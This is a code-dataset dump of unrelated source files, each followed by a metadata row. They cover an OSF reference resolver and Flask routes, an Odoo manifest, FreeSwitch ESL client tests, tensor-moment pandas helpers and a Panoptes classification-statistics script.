id_map[item.id] = item
# end utility
def add_cmd_refs(cmds):
"""Adds idrefs from given commands to our maps and lists"""
for cmd in cmds:
add_to_idmap(cmd)
if cmd.refersto is not None:
idrefs.append(cmd.refersto)
# end for each command to handle
# end utility
# Need to delay import due to cycles ...
from .schema import IDRef
from .types import Instance, Task
# First, gather all items with an ID - for now we assume anything can point at anything
# Which is the case for Instances to tasks, but not for IDs
for item, level in self._iter_(self, self.downstream, self.breadth_first):
# This will iterate tasks and instances
if isinstance(item, Instance):
idrefs.append(item.taskref)
continue
# end handle instance
# Handle Task or Job
# Get commands
for cmd_attr in ('cleanup', 'cmds'):
cmds = getattr(item, cmd_attr, None)
if cmds:
add_cmd_refs(cmds)
# end for each command attr
if isinstance(item, Task):
# Its a task
add_to_idmap(item)
if item.title in task_map:
duplicate_tasks.append(item)
task_map[item.title] = item
# end handle task
# end for each iteration step
# At this point, we have no duplicate ids or titles, now resolve the references
for ref in idrefs:
if isinstance(ref, IDRef):
lut = id_map
else:
lut = task_map
# lazily flag the error only if it would be one
if len(duplicate_tasks) > 0:
msg = "The following duplicate tasks where found, Instance references would not be unique: "
msg += ', '.join(str(task) for task in duplicate_tasks)
raise AssertionError(msg)
# end handle duplicates
# end handle different reference types
assert ref.id in lut, "reference %s could not be found in lookup table - is there a spelling error?" % ref
ref.instance = lut[ref.id]
# end for each idref
return self
## -- End Interface -- @}
# end class AlfTreeOperator
## -- End Alf Base Classes -- @}
| lgpl-3.0 | 675,927,405,643,338,900 | 38.012461 | 119 | 0.558413 | false |
decodio/test_er | epps_reseller/__openerp__.py | 1 | 3639 | # -*- encoding: utf-8 -*-
##############################################################################
#
# Odoo, Open Source Management Solution
# This module copyright (C) 2015 Slobodni-programi d.o.o.# #
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Epps Reseller Module',
'version': '8.0.1.0.0',
'author': 'Slobodni-programi d.o.o.',
'maintainer': 'False',
'website': 'False',
'license': '',
# any module necessary for this one to work correctly
'depends': [
'product',
'epps_project',
],
'external_dependencies': {
'python': [],
},
# Categories can be used to filter modules in modules listing
# Check https://github.com/odoo/odoo/blob/master/openerp/addons/base/module/module_data.xml # noqa
# for the full list
'category': 'EPPS Modules',
'summary': 'Epps common modules collection install via dependencies',
'description': """
.. image:: https://img.shields.io/badge/licence-AGPL--3-blue.svg
:target: http://www.gnu.org/licenses/agpl-3.0-standalone.html
:alt: License: AGPL-3
===========
Module name
===========
This module was written to extend the functionality of ... to support ...
and allow you to ...
Installation
============
To install this module, you need to:
* do this ...
Configuration
=============
To configure this module, you need to:
* go to ...
Usage
=====
To use this module, you need to:
* go to ...
.
Known issues / Roadmap
======================
* ...
Credits
=======
Contributors
------------
* Firstname Lastname <[email protected]>
Maintainer
----------
:alt: Odoo Community Association
:target: http://odoo-community.org
This module is maintained by the OCA.
OCA, or the Odoo Community Association, is a nonprofit organization whose
mission is to support the collaborative development of Odoo features and
promote its widespread use.
To contribute to this module, please visit http://odoo-community.org.
* Module exported by the Module Prototyper module for version 8.0.
* If you have any questions, please contact Savoir-faire Linux
([email protected])
""",
# always loaded
'data': [
'views/reseller_order_view.xml',
'views/partner_view.xml',
'data/reseller_order_sequence.xml',
'security/ir.model.access.csv',
],
# only loaded in demonstration mode
'demo': [
],
# used for Javascript Web Client Testing with QUnit / PhantomJS
# https://www.odoo.com/documentation/8.0/reference/javascript.html#testing-in-odoo-web-client # noqa
'js': [],
'css': [],
'qweb': [],
'installable': True,
# Install this module automatically if all dependency have been previously
# and independently installed. Used for synergetic or glue modules.
'auto_install': False,
'application': False,
}
| agpl-3.0 | 7,411,549,032,246,315,000 | 26.360902 | 105 | 0.622424 | false |
praekelt/vumi-freeswitch-esl | vxfreeswitch/tests/test_client.py | 1 | 10118 | """ Tests for vxfreeswitch.client. """
from zope.interface import implementer
from twisted.internet.interfaces import IStreamClientEndpoint
from twisted.internet.defer import inlineCallbacks, Deferred, fail, succeed
from twisted.internet.protocol import ClientFactory
from twisted.test.proto_helpers import StringTransportWithDisconnection
from twisted.python.failure import Failure
from twisted.trial.unittest import TestCase
from eventsocket import EventError
from vxfreeswitch.client import (
FreeSwitchClientProtocol, FreeSwitchClientFactory,
FreeSwitchClient, FreeSwitchClientReply, FreeSwitchClientError)
from vxfreeswitch.tests.helpers import FixtureApiResponse, FixtureReply
def connect_transport(protocol, factory=None):
""" Connect a StringTransport to a client protocol. """
if factory is None:
factory = ClientFactory()
transport = StringTransportWithDisconnection()
protocol.makeConnection(transport)
transport.protocol = protocol
protocol.factory = factory
return transport
@implementer(IStreamClientEndpoint)
class StringClientEndpoint(object):
""" Client endpoint that connects to a StringTransport. """
transport = None
def connect(self, factory):
try:
protocol = factory.buildProtocol("dummy-address")
self.transport = connect_transport(protocol, factory)
except Exception:
return fail()
return succeed(protocol)
class TestFreeSwitchClientProtocol(TestCase):
def test_connected(self):
p = FreeSwitchClientProtocol(auth=None)
self.assertTrue(isinstance(p._connected, Deferred))
self.assertEqual(p._connected.called, False)
connect_transport(p)
self.assertEqual(p._connected.called, True)
self.assertEqual(p._connected.result, p)
def test_auth(self):
p = FreeSwitchClientProtocol(auth="pw-12345")
tr = connect_transport(p)
self.assertEqual(tr.value(), "auth pw-12345\n\n")
def test_no_auth(self):
p = FreeSwitchClientProtocol(auth=None)
tr = connect_transport(p)
self.assertEqual(tr.value(), "")
class TestFreeSwitchClientFactory(TestCase):
def test_subclasses_client_factory(self):
f = FreeSwitchClientFactory()
self.assertTrue(isinstance(f, ClientFactory))
def test_protocol(self):
f = FreeSwitchClientFactory()
p = f.protocol()
self.assertTrue(isinstance(p, FreeSwitchClientProtocol))
def test_default_noisy(self):
f = FreeSwitchClientFactory()
self.assertEqual(f.noisy, False)
def test_set_noisy(self):
f = FreeSwitchClientFactory(noisy=True)
self.assertEqual(f.noisy, True)
def test_no_auth(self):
f = FreeSwitchClientFactory()
p = f.protocol()
tr = connect_transport(p)
self.assertEqual(tr.value(), "")
def test_auth(self):
f = FreeSwitchClientFactory(auth="pw-1234")
p = f.protocol()
tr = connect_transport(p)
self.assertEqual(tr.value(), "auth pw-1234\n\n")
class TestFreeSwitchClientError(TestCase):
def test_subclasses_exception(self):
err = FreeSwitchClientError("foo")
self.assertTrue(isinstance(err, Exception))
def test_str(self):
err = FreeSwitchClientError("reason")
self.assertEqual(str(err), "reason")
class TestFreeSwitchClientReply(TestCase):
def test_args(self):
reply = FreeSwitchClientReply("a", "b")
self.assertEqual(reply.args, ("a", "b"))
def test_repr(self):
self.assertEqual(
repr(FreeSwitchClientReply("a", "c")),
"<FreeSwitchClientReply args=('a', 'c')>")
def test_equal(self):
self.assertEqual(
FreeSwitchClientReply("a", "b"),
FreeSwitchClientReply("a", "b"))
def test_not_equal(self):
self.assertNotEqual(
FreeSwitchClientReply("a", "b"),
FreeSwitchClientReply("a", "c"))
def test_not_equal_other_object(self):
self.assertNotEqual(
FreeSwitchClientReply("a", "b"),
object())
class TestFreeSwitchClient(TestCase):
def mk_client(self, endpoint=None, auth=None):
return FreeSwitchClient(endpoint=endpoint, auth=auth)
def test_fallback_error_handler_client_error(self):
client = self.mk_client()
failure = Failure(FreeSwitchClientError("reason"))
self.assertEqual(
client.fallback_error_handler(failure), failure)
def test_fallback_error_handler_other_error(self):
client = self.mk_client()
failure = Failure(Exception("reason"))
err = self.failUnlessRaises(
FreeSwitchClientError,
client.fallback_error_handler, failure)
self.assertEqual(str(err), "reason")
def test_event_error_handler_event_error_has_reply(self):
client = self.mk_client()
failure = Failure(EventError({"Reply_Text": "+ERROR eep"}))
err = self.failUnlessRaises(
FreeSwitchClientError,
client.event_error_handler, failure)
self.assertEqual(str(err), "+ERROR eep")
def test_event_error_handler_event_error_no_reply(self):
client = self.mk_client()
failure = Failure(EventError({"Not_Reply": "foo"}))
err = self.failUnlessRaises(
FreeSwitchClientError,
client.event_error_handler, failure)
self.assertEqual(str(err), "{'Not_Reply': 'foo'}")
def test_event_error_handler_other_error(self):
client = self.mk_client()
failure = Failure(Exception("reason"))
self.assertEqual(
client.event_error_handler(failure), failure)
def test_request_callback_with_reply(self):
client = self.mk_client()
self.assertEqual(
client.request_callback({'Reply_Text': 'a b'}),
FreeSwitchClientReply('a', 'b'))
def test_request_callback_without_reply(self):
client = self.mk_client()
self.assertEqual(
client.request_callback({}),
FreeSwitchClientReply())
def test_api_request_callback_with_okay_response(self):
client = self.mk_client()
self.assertEqual(
client.api_request_callback({
'data': {
'rawresponse': '+OK meep moop'
}
}),
FreeSwitchClientReply('+OK', 'meep', 'moop'))
def test_api_request_callback_with_error_response(self):
client = self.mk_client()
err = self.failUnlessRaises(
FreeSwitchClientError,
client.api_request_callback, {
'data': {
'rawresponse': '+ERROR meep moop'
}
})
self.assertEqual(str(err), "+ERROR meep moop")
def test_api_request_callback_without_data(self):
client = self.mk_client()
err = self.failUnlessRaises(
FreeSwitchClientError,
client.api_request_callback, {
'foo': 'bar',
})
self.assertEqual(str(err), "{'foo': 'bar'}")
def test_api_request_callback_without_rawresponse(self):
client = self.mk_client()
err = self.failUnlessRaises(
FreeSwitchClientError,
client.api_request_callback, {
'data': {}
})
self.assertEqual(str(err), "{'data': {}}")
@inlineCallbacks
def test_with_connection(self):
endpoint = StringClientEndpoint()
client = self.mk_client(endpoint=endpoint)
f_called = Deferred()
def f(conn):
wait = Deferred()
f_called.callback((wait, conn))
return wait
d = client.with_connection(f)
self.assertEqual(endpoint.transport.connected, True)
self.assertEqual(endpoint.transport.value(), "")
self.assertTrue(isinstance(d.result, Deferred))
f_wait, f_conn = yield f_called
self.assertTrue(isinstance(f_conn, FreeSwitchClientProtocol))
self.assertTrue(isinstance(d.result, Deferred))
self.assertEqual(f_wait.called, False)
f_wait.callback({'foo': 'bar'})
reply = yield d
self.assertEqual(reply, {'foo': 'bar'})
self.assertEqual(endpoint.transport.value(), "")
self.assertEqual(endpoint.transport.connected, False)
@inlineCallbacks
def test_api(self):
endpoint = StringClientEndpoint()
client = self.mk_client(endpoint=endpoint)
d = client.api("foo")
self.assertEqual(endpoint.transport.value(), "api foo\n\n")
self.assertEqual(endpoint.transport.connected, True)
endpoint.transport.protocol.dataReceived(
FixtureApiResponse("+OK moo").to_bytes())
result = yield d
self.assertEqual(result, FreeSwitchClientReply("+OK", "moo"))
self.assertEqual(endpoint.transport.value(), "api foo\n\n")
self.assertEqual(endpoint.transport.connected, False)
@inlineCallbacks
def test_auth(self):
endpoint = StringClientEndpoint()
client = self.mk_client(endpoint=endpoint, auth="kenny")
f_called = Deferred()
def f(conn):
wait = Deferred()
f_called.callback((wait, conn))
return wait
d = client.with_connection(f)
self.assertEqual(endpoint.transport.value(), "auth kenny\n\n")
self.assertEqual(endpoint.transport.connected, True)
self.assertEqual(f_called.called, False)
self.assertTrue(isinstance(d.result, Deferred))
endpoint.transport.protocol.dataReceived(
FixtureReply("+OK").to_bytes())
f_wait, f_conn = yield f_called
self.assertTrue(isinstance(f_conn, FreeSwitchClientProtocol))
self.assertEqual(f_wait.called, False)
f_wait.callback({"foo": "bar"})
reply = yield d
self.assertEqual(reply, {"foo": "bar"})
self.assertEqual(endpoint.transport.value(), "auth kenny\n\n")
self.assertEqual(endpoint.transport.connected, False)
| bsd-3-clause | -8,122,824,378,007,507,000 | 33.06734 | 75 | 0.631251 | false |
fthoele/tensormoments | tensormoments/tools.py | 1 | 5153 | import pandas as pd
import numpy as np
from operator import and_
from six import iteritems
from functools import reduce
import warnings
def transformGroupToReal(dataframe):
""" Takes a dataframe and transforms the groups in it to a real representation.
Args:
dataframe:
Returns:
A copy of the old dataframe, containing the transformed elements.
"""
warnings.warn("Use new transformation transform_group_to_real", DeprecationWarning )
mult = len(dataframe)
l = int((mult-1)/2)
newDataframe = dataframe.copy()
for m in range(-l,l+1):
valPositive = dataframe.loc[dataframe.t == m, 'value'].values[0]
valNegative = dataframe.loc[dataframe.t == -m, 'value'].values[0]
if m < 0:
newValue = (valPositive - ((-1)**m) *valNegative) * 1j/np.sqrt(2)
elif m > 0:
newValue = (valNegative + ((-1)**m) * valPositive) * 1./np.sqrt(2)
else:
newValue = valPositive
newDataframe.loc[newDataframe.t == m, "value"] = newValue
return newDataframe
def filterTmoms(df, **kwargs):
""" Returns all tensor moments to which the filter arguments in kwargs apply.
Keys are: atom, species, nu, l1, l2, k, p, r, t
"""
labels = list(df)
filters = []
for key, value in iteritems(kwargs):
if key in labels:
filters.append(df[key] == value)
if filters:
finalFilter = reduce(and_, filters)
return df.loc[finalFilter]
else:
return df
def transformFrameToReal(dataframe):
""" Transforms the given dataframe to the real spherical harmonic basis.
"""
warnings.warn("Use new transformation function transform_to_real", DeprecationWarning)
grouped = dataframe.groupby(['k','p','r', 'atom', 'species','nu', 'l1', 'l2'])
realList = []
for name, group in grouped:
newGroup = transformGroupToReal(group)
realList.append(newGroup)
realdf = pd.concat(realList)
return realdf
def transform_to_real(dataframe):
""" Improved version of the transformation. Takes dataframe, and transforms all pairs of (t, v) to their real representation.
Args:
dataframe:
Returns:
A dataframe with all pairs transformed to real.
"""
columns = list(dataframe)
columns.remove("t")
columns.remove("value")
grouped = dataframe.groupby(columns)
realList = []
for iframe, (name, group) in enumerate(grouped):
newGroup = transform_group_to_real(group, columns, name)
realList.extend(newGroup)
realdf = pd.DataFrame(realList)
return realdf
def transform_group_to_real(g, group_columns, group_values):
""" Helper method that transforms one group of values.
Args:
g: The group dataframe obtained by the groupby operation.
group_columns: The columns used for grouping.
group_values: The values of the grouping columns for this transformation operation.
Returns:
A list of dicts, each dict containing a row in the dataframe.
"""
prototype = {k: v for (k, v) in zip(group_columns, group_values)}
mult = len(g)
l = int((mult - 1) / 2)
sorted_g = g.sort_values("t")
sorted_values = sorted_g.value.as_matrix()
results = []
for m in range(-l, l + 1):
valPositive = sorted_values[m + l]
valNegative = sorted_values[-m + l]
if m < 0:
newValue = (valPositive - ((-1) ** m) * valNegative) * 1j / np.sqrt(2)
elif m > 0:
newValue = (valNegative + ((-1) ** m) * valPositive) * 1. / np.sqrt(2)
else:
newValue = valPositive
# newValue = np.real(newValue)
result_dict = prototype.copy()
result_dict['value_real'] = np.real(newValue)
result_dict['value_imag'] = np.imag(newValue)
result_dict['t'] = m
results.append(result_dict)
return results
def insert_vectors_into_vesta(vectors, vesta_template_file, vector_scale=1.0,
template_string_vectt="{VECTT}", template_string_vectr="{VECTR}",
template_string_vects="{VECTS}"):
""" Replaces template string in a vesta file with the correct representation for a number of vectors.
Args:
vectors:
vesta_template_file:
template_string_vectt:
template_string_vectr:
Returns:
"""
vectors = np.array(vectors)
if vectors.shape[1] < 3:
raise ValueError("Not enough y dimensions in input data")
vectr = ""
vectt = ""
for ivect, vector in enumerate(vectors, start=1):
vectr += " {} {} {} {} 0\n".format(ivect, *vector)
vectr += " {} 0 0 0 0\n".format(ivect)
vectr += "0 0 0 0 0\n"
vectt += " {} 0.500 255 0 0 1\n".format(ivect)
with open(vesta_template_file) as fp:
text = fp.read()
text = text.replace(template_string_vectr, vectr)
text = text.replace(template_string_vectt, vectt)
text = text.replace(template_string_vects, f"{vector_scale:8.3f}")
return text | mit | -5,701,005,479,903,698,000 | 30.619632 | 129 | 0.605473 | false |
vrooje/panoptes_analysis | basic_project_stats.py | 1 | 8792 | #Python 2.7.9 (default, Apr 5 2015, 22:21:35)
import sys
# file with raw classifications (csv)
# put this way up here so if there are no inputs we exit quickly before even trying to load everything else
try:
classfile_in = sys.argv[1]
except:
#classfile_in = 'data/2e3d12a2-56ca-4d1f-930a-9ecc7fd39885.csv'
print "\nUsage: "+sys.argv[0]+" classifications_infile"
print " classifications_infile is a Zooniverse (Panoptes) classifications data export CSV."
print "\nAll output will be to stdout (about a paragraph worth).\n"
sys.exit(0)
import numpy as np # using 1.10.1
import pandas as pd # using 0.13.1
#import datetime
#import dateutil.parser
import json
# columns currently in an exported Panoptes classification file:
# classification_id,user_name,user_id,user_ip,workflow_id,workflow_name,workflow_version,created_at,gold_standard,expert,metadata,annotations,subject_data
# classification_id identifies the specific classification - should be unique for each row in this file
# user_name is either their registered name or "not-logged-in"+their hashed IP
# user_id is their numeric Zooniverse ID or blank if they're unregistered
# user_ip is a hashed version of their IP
# workflow_id is the numeric ID of this workflow, which you can find in the project builder URL for managing the workflow:
# https://www.zooniverse.org/lab/[project_id]/workflow/[workflow_id]/
# workflow_name is the name you gave your workflow (for sanity checks)
# workflow_version is [bigchangecount].[smallchangecount] and is probably pretty big
# created_at is the date the entry for the classification was recorded
# gold_standard is 1 if this classification was done in gold standard mode
# expert is 1 if this classification was done in expert mode... I think
# metadata (json) is the data the browser sent along with the classification.
# Includes browser information, language, started_at and finished_at
# note started_at and finished_at are perhaps the easiest way to calculate the length of a classification
# (the duration elapsed between consecutive created_at by the same user is another way)
# the difference here is back-end vs front-end
# annotations (json) contains the actual classification information
# which for this analysis we will ignore completely, for now
# subject_data is cross-matched from the subjects table and is for convenience in data reduction
# here we will ignore this too, except to count subjects once.
# we'll also ignore classification_id, user_ip, workflow information, gold_standard, and expert.
#
# some of these will be defined further down, but before we actually use this list.
#cols_used = ["created_at_ts", "user_name", "user_id", "created_at", "started_at", "finished_at"]
# Print out the input parameters just as a sanity check
print "Computing project stats using:"
print " infile:",classfile_in
#################################################################################
#################################################################################
#################################################################################
# Get the Gini coefficient - https://en.wikipedia.org/wiki/Gini_coefficient
#
# The Gini coefficient measures inequality in distributions of things.
# It was originally conceived for economics (e.g. where is the wealth in a country?
# in the hands of many citizens or a few?), but it's just as applicable to many
# other fields. In this case we'll use it to see how classifications are
# distributed among classifiers.
# G = 0 is a completely even distribution (everyone does the same number of
# classifications), and ~1 is uneven (~all the classifications are done
# by one classifier).
# Typical values of the Gini for healthy Zooniverse projects (Cox et al. 2015) are
# in the range of 0.7-0.9.
# That range is generally indicative of a project with a loyal core group of
# volunteers who contribute the bulk of the classification effort, but balanced
# out by a regular influx of new classifiers trying out the project, from which
# you continue to draw to maintain a core group of prolific classifiers.
# Once your project is fairly well established, you can compare it to past Zooniverse
# projects to see how you're doing.
# If your G is << 0.7, you may be having trouble recruiting classifiers into a loyal
# group of volunteers. People are trying it, but not many are staying.
# If your G is > 0.9, it's a little more complicated. If your total classification
# count is lower than you'd like it to be, you may be having trouble recruiting
# classifiers to the project, such that your classification counts are
# dominated by a few people.
# But if you have G > 0.9 and plenty of classifications, this may be a sign that your
# loyal users are -really- committed, so a very high G is not necessarily a bad thing.
#
# Of course the Gini coefficient is a simplified measure that doesn't always capture
# subtle nuances and so forth, but it's still a useful broad metric.
def gini(list_of_values):
sorted_list = sorted(list_of_values)
height, area = 0, 0
for value in sorted_list:
height += value
area += height - value / 2.
fair_area = height * len(list_of_values) / 2
return (fair_area - area) / fair_area
#################################################################################
#################################################################################
#################################################################################
# Begin the main stuff
print "Reading classifications from "+classfile_in
classifications = pd.read_csv(classfile_in)
# first, extract the started_at and finished_at from the annotations column
classifications['meta_json'] = [json.loads(q) for q in classifications.metadata]
classifications['started_at_str'] = [q['started_at'] for q in classifications.meta_json]
classifications['finished_at_str'] = [q['finished_at'] for q in classifications.meta_json]
classifications['created_day'] = [q[:10] for q in classifications.created_at]
first_class_day = min(classifications.created_day).replace(' ', '')
last_class_day = max(classifications.created_day).replace(' ', '')
# grab the subject counts
n_subj_tot = len(classifications.subject_data.unique())
by_subject = classifications.groupby('subject_data')
subj_class = by_subject.created_at.aggregate('count')
# basic stats on how classified the subjects are
subj_class_mean = np.mean(subj_class)
subj_class_med = np.median(subj_class)
subj_class_min = np.min(subj_class)
subj_class_max = np.max(subj_class)
# save processing time and memory in the groupby.apply(); only keep the columns we're going to use
#classifications = classifications[cols_used]
# index by created_at as a timeseries
# note: this means things might not be uniquely indexed
# but it makes a lot of things easier and faster.
# update: it's not really needed in the main bit, but will do it on each group later.
#classifications.set_index('created_at_ts', inplace=True)
all_users = classifications.user_name.unique()
by_user = classifications.groupby('user_name')
# get total classification and user counts
n_class_tot = len(classifications)
n_users_tot = len(all_users)
unregistered = [q.startswith("not-logged-in") for q in all_users]
n_unreg = sum(unregistered)
n_reg = n_users_tot - n_unreg
# for the leaderboard, which I recommend project builders never make public because
# Just Say No to gamification
# But it's still interesting to see who your most prolific classifiers are, and
# e.g. whether they're also your most prolific Talk users
nclass_byuser = by_user.created_at.aggregate('count')
nclass_byuser_ranked = nclass_byuser.copy()
nclass_byuser_ranked.sort(ascending=False)
# very basic stats
nclass_med = np.median(nclass_byuser)
nclass_mean = np.mean(nclass_byuser)
# Gini coefficient - see the comments above the gini() function for more notes
nclass_gini = gini(nclass_byuser)
print "\nOverall:\n\n",n_class_tot,"classifications of",n_subj_tot,"subjects by",n_users_tot,"classifiers,"
print n_reg,"registered and",n_unreg,"unregistered.\n"
print "That's %.2f classifications per subject on average (median = %.1f)." % (subj_class_mean, subj_class_med)
print "The most classified subject has ",subj_class_max,"classifications; the least-classified subject has",subj_class_min,".\n"
print "Median number of classifications per user:",nclass_med
print "Mean number of classifications per user: %.2f" % nclass_mean
print "\nTop 10 most prolific classifiers:\n",nclass_byuser_ranked.head(10)
print "\n\nGini coefficient for classifications by user: %.2f\n" % nclass_gini
# That's it. This program is very basic.
| gpl-2.0 | 2,390,939,211,970,713,600 | 43.857143 | 154 | 0.704163 | false |
HalcyonChimera/osf.io | website/routes.py | 1 | 55026 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import os
import httplib as http
import requests
import urlparse
import waffle
import json
from flask import request
from flask import send_from_directory
from flask import Response
from flask import stream_with_context
from flask import g
from django.core.urlresolvers import reverse
from django.conf import settings as api_settings
from geolite2 import geolite2
from framework import status
from framework import sentry
from framework.auth import cas
from framework.routing import Rule
from framework.flask import redirect
from framework.routing import WebRenderer
from framework.exceptions import HTTPError
from framework.routing import json_renderer
from framework.routing import process_rules
from framework.auth import views as auth_views
from framework.routing import render_mako_string
from framework.auth.core import _get_current_user
from osf import features
from osf.models import Institution
from osf.utils import sanitize
from website import util
from website import prereg
from website import settings
from website import language
from website.util import metrics
from website.util import paths
from website import maintenance
from website import landing_pages as landing_page_views
from website import views as website_views
from website.citations import views as citation_views
from website.search import views as search_views
from website.oauth import views as oauth_views
from addons.osfstorage import views as osfstorage_views
from website.profile.utils import get_profile_image_url
from website.profile import views as profile_views
from website.project import views as project_views
from addons.base import views as addon_views
from website.discovery import views as discovery_views
from website.conferences import views as conference_views
from website.preprints import views as preprint_views
from website.registries import views as registries_views
from website.reviews import views as reviews_views
from website.institutions import views as institution_views
from website.notifications import views as notification_views
from website.ember_osf_web import views as ember_osf_web_views
from website.closed_challenges import views as closed_challenges_views
from website.identifiers import views as identifier_views
from website.settings import EXTERNAL_EMBER_APPS, EXTERNAL_EMBER_SERVER_TIMEOUT
def set_status_message(user):
if user and not user.accepted_terms_of_service:
status.push_status_message(
message=language.TERMS_OF_SERVICE.format(api_domain=settings.API_DOMAIN,
user_id=user._id,
csrf_token=json.dumps(g.get('csrf_token'))),
kind='default',
dismissible=True,
trust=True,
jumbotron=True,
id='terms_of_service',
extra={}
)
def get_globals():
"""Context variables that are available for every template rendered by
OSFWebRenderer.
"""
user = _get_current_user()
set_status_message(user)
user_institutions = [{'id': inst._id, 'name': inst.name, 'logo_path': inst.logo_path_rounded_corners} for inst in user.affiliated_institutions.all()] if user else []
location = geolite2.reader().get(request.remote_addr) if request.remote_addr else None
if request.host_url != settings.DOMAIN:
try:
inst_id = Institution.objects.get(domains__icontains=request.host, is_deleted=False)._id
request_login_url = '{}institutions/{}'.format(settings.DOMAIN, inst_id)
except Institution.DoesNotExist:
request_login_url = request.url.replace(request.host_url, settings.DOMAIN)
else:
request_login_url = request.url
return {
'private_link_anonymous': is_private_link_anonymous_view(),
'user_name': user.username if user else '',
'user_full_name': user.fullname if user else '',
'user_id': user._id if user else '',
'user_locale': user.locale if user and user.locale else '',
'user_timezone': user.timezone if user and user.timezone else '',
'user_url': user.url if user else '',
'user_profile_image': get_profile_image_url(user=user, size=25) if user else '',
'user_email_verifications': user.unconfirmed_email_info if user else [],
'user_api_url': user.api_url if user else '',
'user_entry_point': metrics.get_entry_point(user) if user else '',
'user_institutions': user_institutions if user else None,
'display_name': user.fullname if user else '',
'anon': {
'continent': (location or {}).get('continent', {}).get('code', None),
'country': (location or {}).get('country', {}).get('iso_code', None),
},
'use_cdn': settings.USE_CDN_FOR_CLIENT_LIBS,
'sentry_dsn_js': settings.SENTRY_DSN_JS if sentry.enabled else None,
'dev_mode': settings.DEV_MODE,
'allow_login': settings.ALLOW_LOGIN,
'cookie_name': settings.COOKIE_NAME,
'status': status.pop_status_messages(),
'prev_status': status.pop_previous_status_messages(),
'domain': settings.DOMAIN,
'api_domain': settings.API_DOMAIN,
'disk_saving_mode': settings.DISK_SAVING_MODE,
'language': language,
'noteworthy_links_node': settings.NEW_AND_NOTEWORTHY_LINKS_NODE,
'popular_links_node': settings.POPULAR_LINKS_NODE,
'web_url_for': util.web_url_for,
'api_url_for': util.api_url_for,
'api_v2_url': util.api_v2_url, # URL function for templates
'api_v2_domain': settings.API_DOMAIN,
'api_v2_base': util.api_v2_url(''), # Base url used by JS api helper
'sanitize': sanitize,
'sjson': lambda s: sanitize.safe_json(s),
'webpack_asset': paths.webpack_asset,
'osf_url': settings.INTERNAL_DOMAIN,
'waterbutler_url': settings.WATERBUTLER_URL,
'login_url': cas.get_login_url(request_login_url),
'sign_up_url': util.web_url_for('auth_register', _absolute=True, next=request_login_url),
'reauth_url': util.web_url_for('auth_logout', redirect_url=request.url, reauth=True),
'profile_url': cas.get_profile_url(),
'enable_institutions': settings.ENABLE_INSTITUTIONS,
'keen': {
'public': {
'project_id': settings.KEEN['public']['project_id'],
'write_key': settings.KEEN['public']['write_key'],
},
'private': {
'project_id': settings.KEEN['private']['project_id'],
'write_key': settings.KEEN['private']['write_key'],
},
},
'institutional_landing_flag': waffle.flag_is_active(request, features.INSTITUTIONAL_LANDING_FLAG),
'maintenance': maintenance.get_maintenance(),
'recaptcha_site_key': settings.RECAPTCHA_SITE_KEY,
'custom_citations': settings.CUSTOM_CITATIONS,
'osf_support_email': settings.OSF_SUPPORT_EMAIL,
'osf_contact_email': settings.OSF_CONTACT_EMAIL,
'wafflejs_url': '{api_domain}{waffle_url}'.format(api_domain=settings.API_DOMAIN.rstrip('/'), waffle_url=reverse('wafflejs')),
'footer_links': settings.FOOTER_LINKS,
'features': features,
'waffle': waffle,
'csrf_cookie_name': api_settings.CSRF_COOKIE_NAME,
}
def is_private_link_anonymous_view():
# Avoid circular import
from osf.models import PrivateLink
try:
return PrivateLink.objects.filter(key=request.args.get('view_only')).values_list('anonymous', flat=True).get()
except PrivateLink.DoesNotExist:
return False
class OsfWebRenderer(WebRenderer):
"""Render a Mako template with OSF context vars.
:param trust: Optional. If ``False``, markup-safe escaping will be enabled
"""
def __init__(self, *args, **kwargs):
kwargs['data'] = get_globals
super(OsfWebRenderer, self).__init__(*args, **kwargs)
#: Use if a view only redirects or raises error
notemplate = OsfWebRenderer('', renderer=render_mako_string, trust=False)
# Static files (robots.txt, etc.)
def favicon():
return send_from_directory(
settings.STATIC_FOLDER,
'favicon.ico',
mimetype='image/vnd.microsoft.icon'
)
def robots():
"""Serves the robots.txt file."""
# Allow local robots.txt
if os.path.exists(os.path.join(settings.STATIC_FOLDER,
'robots.local.txt')):
robots_file = 'robots.local.txt'
else:
robots_file = 'robots.txt'
return send_from_directory(
settings.STATIC_FOLDER,
robots_file,
mimetype='html'
)
def sitemap_file(path):
"""Serves the sitemap/* files."""
if path.endswith('.xml.gz'):
mime = 'application/x-gzip'
elif path.endswith('.xml'):
mime = 'text/xml'
else:
raise HTTPError(http.NOT_FOUND)
return send_from_directory(
settings.STATIC_FOLDER + '/sitemaps/',
path,
mimetype=mime
)
def ember_app(path=None):
"""Serve the contents of the ember application"""
ember_app_folder = None
fp = path or 'index.html'
ember_app = None
for k in EXTERNAL_EMBER_APPS.keys():
if request.path.strip('/').startswith(k):
ember_app = EXTERNAL_EMBER_APPS[k]
break
if not ember_app:
raise HTTPError(http.NOT_FOUND)
if settings.PROXY_EMBER_APPS:
path = request.path[len(ember_app['path']):]
url = urlparse.urljoin(ember_app['server'], path)
resp = requests.get(url, stream=True, timeout=EXTERNAL_EMBER_SERVER_TIMEOUT, headers={'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'})
excluded_headers = ['content-encoding', 'content-length', 'transfer-encoding', 'connection']
headers = [(name, value) for (name, value) in resp.raw.headers.items() if name.lower() not in excluded_headers]
return Response(resp.content, resp.status_code, headers)
ember_app_folder = os.path.abspath(os.path.join(os.getcwd(), ember_app['path']))
if not ember_app_folder:
raise HTTPError(http.NOT_FOUND)
if not os.path.abspath(os.path.join(ember_app_folder, fp)).startswith(ember_app_folder):
# Prevent accessing files outside of the ember build dir
raise HTTPError(http.NOT_FOUND)
if not os.path.isfile(os.path.join(ember_app_folder, fp)):
fp = 'index.html'
return send_from_directory(ember_app_folder, fp)
def goodbye():
# Redirect to dashboard if logged in
redirect_url = util.web_url_for('index')
if _get_current_user():
return redirect(redirect_url)
else:
return redirect(redirect_url + '?goodbye=true')
def make_url_map(app):
"""Set up all the routes for the OSF app.
:param app: A Flask/Werkzeug app to bind the rules to.
"""
# Set default views to 404, using URL-appropriate renderers
process_rules(app, [
